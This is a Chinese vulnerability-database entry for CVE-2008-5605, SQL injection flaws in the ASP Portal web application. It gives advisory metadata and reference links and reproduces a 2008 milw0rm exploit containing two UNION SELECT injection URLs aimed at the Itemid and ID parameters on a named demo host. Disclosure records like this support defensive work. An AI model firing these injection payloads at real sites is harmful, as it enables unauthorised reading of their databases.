ASPToys ASP Portal 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116941 漏洞类型 SQL注入
发布时间 2008-12-05 更新时间 2009-03-18
CVE编号 CVE-2008-5605 CNNVD-ID CNNVD-200812-290
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7357
https://cxsecurity.com/issue/WLB-2008120156
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-290
|漏洞详情
ASPPortal是一款基于ASP的使用ACCESS数据库存储站点信息的WEB构建工具。ASPPortal中存在多个SQL注入漏洞。远程攻击者可以借助(1)对classifieds.asp的Itemid参数,和(2)对Events.asp的id参数,执行任意SQL指令。
|漏洞EXP
###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################

---------------------------- Tunisian Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP PORTAL
#download : null
#Demo     : http://demo.merlix.com/portal/


#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory



#Greetz For Synex

###########################################################################

# milw0rm.com [2008-12-05]
|参考资料

来源:XF
名称:aspportal-classifieds-sql-injection(47268)
链接:http://xforce.iss.net/xforce/xfdb/47268
来源:XF
名称:aspportal-classifieds-events-sql-injection(47127)
链接:http://xforce.iss.net/xforce/xfdb/47127
来源:BID
名称:32662
链接:http://www.securityfocus.com/bid/32662
来源:MILW0RM
名称:7357
链接:http://www.milw0rm.com/exploits/7357
来源:SREASON
名称:4763
链接:http://securityreason.com/securityalert/4763